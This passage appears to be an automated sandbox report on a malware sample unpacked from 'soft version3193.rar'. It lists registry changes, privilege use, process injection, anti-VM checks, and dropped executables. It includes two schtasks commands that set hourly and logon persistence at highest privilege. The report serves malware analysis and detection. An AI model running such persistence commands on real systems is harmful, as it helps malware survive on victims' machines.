Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket	kKGgJLM.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	kKGgJLM.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	kKGgJLM.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	kKGgJLM.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "0"	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	kKGgJLM.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe

Modifies registry class 4 IoCs

Processes:

7zFM.exeOpenWith.execmd.exeOpenWith.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings	7zFM.exe
Key created	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings	OpenWith.exe

Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

NOTEPAD.EXE

pid process

1368 NOTEPAD.EXE

pid	process
1368	NOTEPAD.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
4268	schtasks.exe
3244	schtasks.exe
1880	schtasks.exe
1212	schtasks.exe
3612	schtasks.exe
2432	schtasks.exe
4640	schtasks.exe
4288	schtasks.exe
2624	schtasks.exe
3200	schtasks.exe
3612	schtasks.exe
1872	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

7zFM.exesetup.exesetup.exeLAjLRnhV4UjOx8B3HbyvLFc4.exeG8FbtlgLE3rUkMPXnsq75quh.exenuFrcSpmylkm5G1HC88Qwegm.exepowershell.exemAph8Of7DxihsslLJNYfDDIp.exepowershell.exeMSBuild.exeMSBuild.exeBAEBFIIECB.exeMSBuild.exeexplortu.exeeqtpkqwqodik.exeexplortu.exepowershell.exepowershell.exepowershell.exepowershell.EXE

pid	process
2832	7zFM.exe
2832	7zFM.exe
4732	setup.exe
4732	setup.exe
2096	setup.exe
2096	setup.exe
4428	LAjLRnhV4UjOx8B3HbyvLFc4.exe
4428	LAjLRnhV4UjOx8B3HbyvLFc4.exe
1372	G8FbtlgLE3rUkMPXnsq75quh.exe
1372	G8FbtlgLE3rUkMPXnsq75quh.exe
840	nuFrcSpmylkm5G1HC88Qwegm.exe
840	nuFrcSpmylkm5G1HC88Qwegm.exe
4392	powershell.exe
4392	powershell.exe
4392	powershell.exe
1876	mAph8Of7DxihsslLJNYfDDIp.exe
1876	mAph8Of7DxihsslLJNYfDDIp.exe
4792	powershell.exe
4792	powershell.exe
4792	powershell.exe
1372	G8FbtlgLE3rUkMPXnsq75quh.exe
1372	G8FbtlgLE3rUkMPXnsq75quh.exe
3220	MSBuild.exe
3220	MSBuild.exe
2356	MSBuild.exe
2356	MSBuild.exe
1700	BAEBFIIECB.exe
1700	BAEBFIIECB.exe
2356	MSBuild.exe
2356	MSBuild.exe
3848	MSBuild.exe
3848	MSBuild.exe
3820	explortu.exe
3820	explortu.exe
3848	MSBuild.exe
3848	MSBuild.exe
840	nuFrcSpmylkm5G1HC88Qwegm.exe
840	nuFrcSpmylkm5G1HC88Qwegm.exe
840	nuFrcSpmylkm5G1HC88Qwegm.exe
840	nuFrcSpmylkm5G1HC88Qwegm.exe
840	nuFrcSpmylkm5G1HC88Qwegm.exe
840	nuFrcSpmylkm5G1HC88Qwegm.exe
840	nuFrcSpmylkm5G1HC88Qwegm.exe
840	nuFrcSpmylkm5G1HC88Qwegm.exe
4088	eqtpkqwqodik.exe
4088	eqtpkqwqodik.exe
4088	eqtpkqwqodik.exe
4088	eqtpkqwqodik.exe
4088	eqtpkqwqodik.exe
4088	eqtpkqwqodik.exe
4088	eqtpkqwqodik.exe
4088	eqtpkqwqodik.exe
2236	explortu.exe
2236	explortu.exe
180	powershell.exe
180	powershell.exe
180	powershell.exe
1212	powershell.exe
1212	powershell.exe
1212	powershell.exe
3352	powershell.exe
3352	powershell.exe
3352	powershell.exe
1424	powershell.EXE

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

OpenWith.exe7zFM.exe

pid process

1512 OpenWith.exe
2832 7zFM.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

7zFM.exePXLm4NTG4LxHCIQW6UGEFQZ3.exexBXjl0R8rYG45a3wzU77TxNo.exepowershell.exeMSBuild.exemAph8Of7DxihsslLJNYfDDIp.exepowershell.exeWMIC.exeMSBuild.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeRestorePrivilege	2832	7zFM.exe
Token: 35	2832	7zFM.exe
Token: SeSecurityPrivilege	2832	7zFM.exe
Token: SeSecurityPrivilege	2832	7zFM.exe
Token: SeSecurityPrivilege	2832	7zFM.exe
Token: SeSecurityPrivilege	2832	7zFM.exe
Token: SeDebugPrivilege	5092	PXLm4NTG4LxHCIQW6UGEFQZ3.exe
Token: SeDebugPrivilege	4456	xBXjl0R8rYG45a3wzU77TxNo.exe
Token: SeDebugPrivilege	4392	powershell.exe
Token: SeDebugPrivilege	3220	MSBuild.exe
Token: SeBackupPrivilege	3220	MSBuild.exe
Token: SeSecurityPrivilege	3220	MSBuild.exe
Token: SeSecurityPrivilege	3220	MSBuild.exe
Token: SeSecurityPrivilege	3220	MSBuild.exe
Token: SeSecurityPrivilege	3220	MSBuild.exe
Token: SeDebugPrivilege	1876	mAph8Of7DxihsslLJNYfDDIp.exe
Token: SeDebugPrivilege	4792	powershell.exe
Token: SeIncreaseQuotaPrivilege	752	WMIC.exe
Token: SeSecurityPrivilege	752	WMIC.exe
Token: SeTakeOwnershipPrivilege	752	WMIC.exe
Token: SeLoadDriverPrivilege	752	WMIC.exe
Token: SeSystemProfilePrivilege	752	WMIC.exe
Token: SeSystemtimePrivilege	752	WMIC.exe
Token: SeProfSingleProcessPrivilege	752	WMIC.exe
Token: SeIncBasePriorityPrivilege	752	WMIC.exe
Token: SeCreatePagefilePrivilege	752	WMIC.exe
Token: SeBackupPrivilege	752	WMIC.exe
Token: SeRestorePrivilege	752	WMIC.exe
Token: SeShutdownPrivilege	752	WMIC.exe
Token: SeDebugPrivilege	752	WMIC.exe
Token: SeSystemEnvironmentPrivilege	752	WMIC.exe
Token: SeRemoteShutdownPrivilege	752	WMIC.exe
Token: SeUndockPrivilege	752	WMIC.exe
Token: SeManageVolumePrivilege	752	WMIC.exe
Token: 33	752	WMIC.exe
Token: 34	752	WMIC.exe
Token: 35	752	WMIC.exe
Token: 36	752	WMIC.exe
Token: SeIncreaseQuotaPrivilege	752	WMIC.exe
Token: SeSecurityPrivilege	752	WMIC.exe
Token: SeTakeOwnershipPrivilege	752	WMIC.exe
Token: SeLoadDriverPrivilege	752	WMIC.exe
Token: SeSystemProfilePrivilege	752	WMIC.exe
Token: SeSystemtimePrivilege	752	WMIC.exe
Token: SeProfSingleProcessPrivilege	752	WMIC.exe
Token: SeIncBasePriorityPrivilege	752	WMIC.exe
Token: SeCreatePagefilePrivilege	752	WMIC.exe
Token: SeBackupPrivilege	752	WMIC.exe
Token: SeRestorePrivilege	752	WMIC.exe
Token: SeShutdownPrivilege	752	WMIC.exe
Token: SeDebugPrivilege	752	WMIC.exe
Token: SeSystemEnvironmentPrivilege	752	WMIC.exe
Token: SeRemoteShutdownPrivilege	752	WMIC.exe
Token: SeUndockPrivilege	752	WMIC.exe
Token: SeManageVolumePrivilege	752	WMIC.exe
Token: 33	752	WMIC.exe
Token: 34	752	WMIC.exe
Token: 35	752	WMIC.exe
Token: 36	752	WMIC.exe
Token: SeDebugPrivilege	3848	MSBuild.exe
Token: SeShutdownPrivilege	3652	powercfg.exe
Token: SeCreatePagefilePrivilege	3652	powercfg.exe
Token: SeShutdownPrivilege	876	powercfg.exe
Token: SeCreatePagefilePrivilege	876	powercfg.exe

Suspicious use of FindShellTrayWindow 9 IoCs

Processes:

7zFM.exe3IfifMzwN9KSsku1z7iQUZZd.tmpBAEBFIIECB.exe

pid process

2832 7zFM.exe
2832 7zFM.exe
2832 7zFM.exe
2832 7zFM.exe
2832 7zFM.exe
2832 7zFM.exe
2832 7zFM.exe
2616 3IfifMzwN9KSsku1z7iQUZZd.tmp
1700 BAEBFIIECB.exe

Suspicious use of SetWindowsHookEx 41 IoCs

Processes:

OpenWith.exeOpenWith.exesetup.exesetup.exeG8FbtlgLE3rUkMPXnsq75quh.exeLAjLRnhV4UjOx8B3HbyvLFc4.exeNSBT2UTHbN3rUH67MwoPLEur.exe3IfifMzwN9KSsku1z7iQUZZd.exe3IfifMzwN9KSsku1z7iQUZZd.tmpInstall.exedirectwavmp3splitter.exeInstall.exedirectwavmp3splitter.exeMSBuild.execmd.exe7785ba0063.exeBitLockerToGo.exe

pid	process
1512	OpenWith.exe
1512	OpenWith.exe
1512	OpenWith.exe
1512	OpenWith.exe
1512	OpenWith.exe
1512	OpenWith.exe
1512	OpenWith.exe
1512	OpenWith.exe
1512	OpenWith.exe
1512	OpenWith.exe
1512	OpenWith.exe
1512	OpenWith.exe
1512	OpenWith.exe
1512	OpenWith.exe
1512	OpenWith.exe
1512	OpenWith.exe
1512	OpenWith.exe
1512	OpenWith.exe
1512	OpenWith.exe
1512	OpenWith.exe
1512	OpenWith.exe
1512	OpenWith.exe
1512	OpenWith.exe
3444	OpenWith.exe
4732	setup.exe
2096	setup.exe
1372	G8FbtlgLE3rUkMPXnsq75quh.exe
4428	LAjLRnhV4UjOx8B3HbyvLFc4.exe
4724	NSBT2UTHbN3rUH67MwoPLEur.exe
3596	3IfifMzwN9KSsku1z7iQUZZd.exe
1372	G8FbtlgLE3rUkMPXnsq75quh.exe
2616	3IfifMzwN9KSsku1z7iQUZZd.tmp
4020	Install.exe
2404	directwavmp3splitter.exe
1840	Install.exe
1428	directwavmp3splitter.exe
2356	MSBuild.exe
1232	cmd.exe
2384	7785ba0063.exe
2384	7785ba0063.exe
3580	BitLockerToGo.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

7zFM.exesetup.exe3IfifMzwN9KSsku1z7iQUZZd.exePXLm4NTG4LxHCIQW6UGEFQZ3.exeNSBT2UTHbN3rUH67MwoPLEur.exexBXjl0R8rYG45a3wzU77TxNo.exeLAjLRnhV4UjOx8B3HbyvLFc4.exe3IfifMzwN9KSsku1z7iQUZZd.tmpInstall.exeInstall.exe

description	pid	process	target process
PID 2832 wrote to memory of 1368	2832	7zFM.exe	NOTEPAD.EXE
PID 2832 wrote to memory of 1368	2832	7zFM.exe	NOTEPAD.EXE
PID 4732 wrote to memory of 1372	4732	setup.exe	G8FbtlgLE3rUkMPXnsq75quh.exe
PID 4732 wrote to memory of 1372	4732	setup.exe	G8FbtlgLE3rUkMPXnsq75quh.exe
PID 4732 wrote to memory of 1372	4732	setup.exe	G8FbtlgLE3rUkMPXnsq75quh.exe
PID 4732 wrote to memory of 4456	4732	setup.exe	xBXjl0R8rYG45a3wzU77TxNo.exe
PID 4732 wrote to memory of 4456	4732	setup.exe	xBXjl0R8rYG45a3wzU77TxNo.exe
PID 4732 wrote to memory of 4456	4732	setup.exe	xBXjl0R8rYG45a3wzU77TxNo.exe
PID 4732 wrote to memory of 4428	4732	setup.exe	LAjLRnhV4UjOx8B3HbyvLFc4.exe
PID 4732 wrote to memory of 4428	4732	setup.exe	LAjLRnhV4UjOx8B3HbyvLFc4.exe
PID 4732 wrote to memory of 4428	4732	setup.exe	LAjLRnhV4UjOx8B3HbyvLFc4.exe
PID 4732 wrote to memory of 5092	4732	setup.exe	PXLm4NTG4LxHCIQW6UGEFQZ3.exe
PID 4732 wrote to memory of 5092	4732	setup.exe	PXLm4NTG4LxHCIQW6UGEFQZ3.exe
PID 4732 wrote to memory of 5092	4732	setup.exe	PXLm4NTG4LxHCIQW6UGEFQZ3.exe
PID 4732 wrote to memory of 2548	4732	setup.exe	f8rA590jTVvwofQOQzIn6gvr.exe
PID 4732 wrote to memory of 2548	4732	setup.exe	f8rA590jTVvwofQOQzIn6gvr.exe
PID 4732 wrote to memory of 4724	4732	setup.exe	NSBT2UTHbN3rUH67MwoPLEur.exe
PID 4732 wrote to memory of 4724	4732	setup.exe	NSBT2UTHbN3rUH67MwoPLEur.exe
PID 4732 wrote to memory of 4724	4732	setup.exe	NSBT2UTHbN3rUH67MwoPLEur.exe
PID 4732 wrote to memory of 840	4732	setup.exe	nuFrcSpmylkm5G1HC88Qwegm.exe
PID 4732 wrote to memory of 840	4732	setup.exe	nuFrcSpmylkm5G1HC88Qwegm.exe
PID 4732 wrote to memory of 3596	4732	setup.exe	3IfifMzwN9KSsku1z7iQUZZd.exe
PID 4732 wrote to memory of 3596	4732	setup.exe	3IfifMzwN9KSsku1z7iQUZZd.exe
PID 4732 wrote to memory of 3596	4732	setup.exe	3IfifMzwN9KSsku1z7iQUZZd.exe
PID 3596 wrote to memory of 2616	3596	3IfifMzwN9KSsku1z7iQUZZd.exe	3IfifMzwN9KSsku1z7iQUZZd.tmp
PID 3596 wrote to memory of 2616	3596	3IfifMzwN9KSsku1z7iQUZZd.exe	3IfifMzwN9KSsku1z7iQUZZd.tmp
PID 3596 wrote to memory of 2616	3596	3IfifMzwN9KSsku1z7iQUZZd.exe	3IfifMzwN9KSsku1z7iQUZZd.tmp
PID 5092 wrote to memory of 3220	5092	PXLm4NTG4LxHCIQW6UGEFQZ3.exe	MSBuild.exe
PID 5092 wrote to memory of 3220	5092	PXLm4NTG4LxHCIQW6UGEFQZ3.exe	MSBuild.exe
PID 5092 wrote to memory of 3220	5092	PXLm4NTG4LxHCIQW6UGEFQZ3.exe	MSBuild.exe
PID 5092 wrote to memory of 3220	5092	PXLm4NTG4LxHCIQW6UGEFQZ3.exe	MSBuild.exe
PID 5092 wrote to memory of 3220	5092	PXLm4NTG4LxHCIQW6UGEFQZ3.exe	MSBuild.exe
PID 5092 wrote to memory of 3220	5092	PXLm4NTG4LxHCIQW6UGEFQZ3.exe	MSBuild.exe
PID 5092 wrote to memory of 3220	5092	PXLm4NTG4LxHCIQW6UGEFQZ3.exe	MSBuild.exe
PID 5092 wrote to memory of 3220	5092	PXLm4NTG4LxHCIQW6UGEFQZ3.exe	MSBuild.exe
PID 4724 wrote to memory of 4020	4724	NSBT2UTHbN3rUH67MwoPLEur.exe	Install.exe
PID 4724 wrote to memory of 4020	4724	NSBT2UTHbN3rUH67MwoPLEur.exe	Install.exe
PID 4724 wrote to memory of 4020	4724	NSBT2UTHbN3rUH67MwoPLEur.exe	Install.exe
PID 4456 wrote to memory of 3848	4456	xBXjl0R8rYG45a3wzU77TxNo.exe	MSBuild.exe
PID 4456 wrote to memory of 3848	4456	xBXjl0R8rYG45a3wzU77TxNo.exe	MSBuild.exe
PID 4456 wrote to memory of 3848	4456	xBXjl0R8rYG45a3wzU77TxNo.exe	MSBuild.exe
PID 4456 wrote to memory of 3848	4456	xBXjl0R8rYG45a3wzU77TxNo.exe	MSBuild.exe
PID 4456 wrote to memory of 3848	4456	xBXjl0R8rYG45a3wzU77TxNo.exe	MSBuild.exe
PID 4456 wrote to memory of 3848	4456	xBXjl0R8rYG45a3wzU77TxNo.exe	MSBuild.exe
PID 4456 wrote to memory of 3848	4456	xBXjl0R8rYG45a3wzU77TxNo.exe	MSBuild.exe
PID 4456 wrote to memory of 3848	4456	xBXjl0R8rYG45a3wzU77TxNo.exe	MSBuild.exe
PID 4428 wrote to memory of 1880	4428	LAjLRnhV4UjOx8B3HbyvLFc4.exe	schtasks.exe
PID 4428 wrote to memory of 1880	4428	LAjLRnhV4UjOx8B3HbyvLFc4.exe	schtasks.exe
PID 4428 wrote to memory of 1880	4428	LAjLRnhV4UjOx8B3HbyvLFc4.exe	schtasks.exe
PID 2616 wrote to memory of 2404	2616	3IfifMzwN9KSsku1z7iQUZZd.tmp	directwavmp3splitter.exe
PID 2616 wrote to memory of 2404	2616	3IfifMzwN9KSsku1z7iQUZZd.tmp	directwavmp3splitter.exe
PID 2616 wrote to memory of 2404	2616	3IfifMzwN9KSsku1z7iQUZZd.tmp	directwavmp3splitter.exe
PID 4020 wrote to memory of 1840	4020	Install.exe	Install.exe
PID 4020 wrote to memory of 1840	4020	Install.exe	Install.exe
PID 4020 wrote to memory of 1840	4020	Install.exe	Install.exe
PID 2616 wrote to memory of 1428	2616	3IfifMzwN9KSsku1z7iQUZZd.tmp	directwavmp3splitter.exe
PID 2616 wrote to memory of 1428	2616	3IfifMzwN9KSsku1z7iQUZZd.tmp	directwavmp3splitter.exe
PID 2616 wrote to memory of 1428	2616	3IfifMzwN9KSsku1z7iQUZZd.tmp	directwavmp3splitter.exe
PID 4428 wrote to memory of 4288	4428	LAjLRnhV4UjOx8B3HbyvLFc4.exe	schtasks.exe
PID 4428 wrote to memory of 4288	4428	LAjLRnhV4UjOx8B3HbyvLFc4.exe	schtasks.exe
PID 4428 wrote to memory of 4288	4428	LAjLRnhV4UjOx8B3HbyvLFc4.exe	schtasks.exe
PID 1840 wrote to memory of 5036	1840	Install.exe	cmd.exe
PID 1840 wrote to memory of 5036	1840	Install.exe	cmd.exe
PID 1840 wrote to memory of 5036	1840	Install.exe	cmd.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\soft version3193.rar"
1⤵
- Modifies registry class
PID:512

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1512

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3652

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Desktop\soft version3193.rar"
1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2832

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\7zO01B04EF7\Licenses.txt
2⤵
- Opens file in notepad (likely ransom note)
PID:1368

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3444

C:\Users\Admin\Desktop\malware\setup.exe
"C:\Users\Admin\Desktop\malware\setup.exe"
1⤵
- Modifies firewall policy service
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4732

C:\Users\Admin\Documents\SimpleAdobe\G8FbtlgLE3rUkMPXnsq75quh.exe
C:\Users\Admin\Documents\SimpleAdobe\G8FbtlgLE3rUkMPXnsq75quh.exe
2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1372

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\BAEBFIIECB.exe"
3⤵
PID:4416

C:\Users\Admin\AppData\Local\Temp\BAEBFIIECB.exe
"C:\Users\Admin\AppData\Local\Temp\BAEBFIIECB.exe"
4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:1700

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
"C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"
5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3820

C:\Users\Admin\AppData\Local\Temp\1000022001\7785ba0063.exe
"C:\Users\Admin\AppData\Local\Temp\1000022001\7785ba0063.exe"
6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:2384

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\FCAFIJJJKE.exe"
3⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:1232

C:\Users\Admin\Documents\SimpleAdobe\xBXjl0R8rYG45a3wzU77TxNo.exe
C:\Users\Admin\Documents\SimpleAdobe\xBXjl0R8rYG45a3wzU77TxNo.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4456

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3848

C:\Users\Admin\Documents\SimpleAdobe\LAjLRnhV4UjOx8B3HbyvLFc4.exe
C:\Users\Admin\Documents\SimpleAdobe\LAjLRnhV4UjOx8B3HbyvLFc4.exe
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4428

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST
3⤵
- Scheduled Task/Job: Scheduled Task
PID:1880

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST
3⤵
- Scheduled Task/Job: Scheduled Task
PID:4288

C:\Users\Admin\Documents\SimpleAdobe\PXLm4NTG4LxHCIQW6UGEFQZ3.exe
C:\Users\Admin\Documents\SimpleAdobe\PXLm4NTG4LxHCIQW6UGEFQZ3.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5092

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3220

C:\Users\Admin\Documents\SimpleAdobe\f8rA590jTVvwofQOQzIn6gvr.exe
C:\Users\Admin\Documents\SimpleAdobe\f8rA590jTVvwofQOQzIn6gvr.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2548

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
3⤵
- Suspicious use of SetWindowsHookEx
PID:3580

C:\Users\Admin\Documents\SimpleAdobe\NSBT2UTHbN3rUH67MwoPLEur.exe
C:\Users\Admin\Documents\SimpleAdobe\NSBT2UTHbN3rUH67MwoPLEur.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4724

C:\Users\Admin\AppData\Local\Temp\7zS1EB5.tmp\Install.exe
.\Install.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4020

C:\Users\Admin\AppData\Local\Temp\7zS256B.tmp\Install.exe
.\Install.exe /JudidKE "525403" /S
4⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1840

C:\Windows\SysWOW64\cmd.exe
